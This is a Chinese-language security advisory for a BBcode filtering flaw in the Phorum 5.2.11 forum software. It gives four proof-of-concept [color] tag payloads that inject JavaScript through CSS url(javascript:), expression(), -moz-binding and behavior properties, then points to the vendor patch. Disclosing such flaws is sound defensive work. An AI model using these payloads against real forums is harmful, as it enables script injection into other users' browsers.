影响版本: Phorum 5.2.11
漏洞描述: BUGTRAQ: 35777
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。 Phorum的过滤引擎没有充分地验证某些BBcode参数,远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。<*参考 crashfr (crashfr@sysdream.com)http://milw0rm.com/exploits/9231 http://secunia.com/advisories/35928/ *>
测试方法: [www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG
安全建议: 厂商补丁: Phorum
目前厂商已经发布了升级补丁以修复这个安全问题。
请到厂商的主页下载: http://www.phorum.org/phorum5/read.php?64,139411
【编辑推荐】
